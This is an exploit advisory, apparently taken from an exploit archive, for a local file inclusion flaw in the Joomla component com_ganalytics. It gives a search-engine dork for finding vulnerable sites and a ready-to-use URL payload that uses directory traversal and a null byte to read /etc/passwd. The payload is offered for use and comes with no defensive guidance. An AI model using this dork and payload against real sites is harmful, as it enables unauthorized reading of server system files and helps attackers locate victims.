id: 11304
date: 03/15/2010
title: Joomla Component com_ganalytics - Local File Inclusion Vulnerability
author: AtT4CKxT3rR0r1ST
cves: 

====================================================================
Joomla Component com_ganalytics - Local File Inclusion Vulnerability
====================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : Joomla Component com_ganalytics
.:. Bug Type : Local File Inclusion [LFI]
.:. Dork : inurl:"com_ganalytics"
 
####################################################################
 
===[ Exploit ]===
 
www.site.com/index.php?option=com_ganalytics&controller=[LFI]
www.site.com/index.php?option=com_ganalytics&controller=../../../../../../../../../../etc/passwd%00
 
####################################################################



#  0day.today [2023-03-24]  #